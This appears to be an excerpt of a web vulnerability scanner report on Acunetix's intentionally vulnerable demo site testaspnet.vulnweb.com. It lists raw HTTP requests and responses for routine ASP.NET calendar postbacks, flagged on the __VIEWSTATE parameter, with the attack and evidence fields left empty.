Request Body - size: 1,099 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8404&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAd5%2Fm7doIZGRk3UAgzxsq%2BnzYlG60GJaWEWh7VrA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKxm4qfCwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVeCvidEQGvNRDcZVzjmBJ3H0Pacw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:19 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAd5/m7doIZGRk3UAgzxsq+nzYlG60GJaWEWh7VrA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKxm4qfCwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVeCvidEQGvNRDcZVzjmBJ3H0Pacw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:White" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8408&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAHkkL8doIZGRksXjxDG7HB9kKqZJczgC095sOik4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLW8bPDAgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXxcDTQg6Rk8ioyxOVMFhUDgqQxQg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:58 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAHkkL8doIZGRksXjxDG7HB9kKqZJczgC095sOik4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLW8bPDAgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXxcDTQg6Rk8ioyxOVMFhUDgqQxQg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:White" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
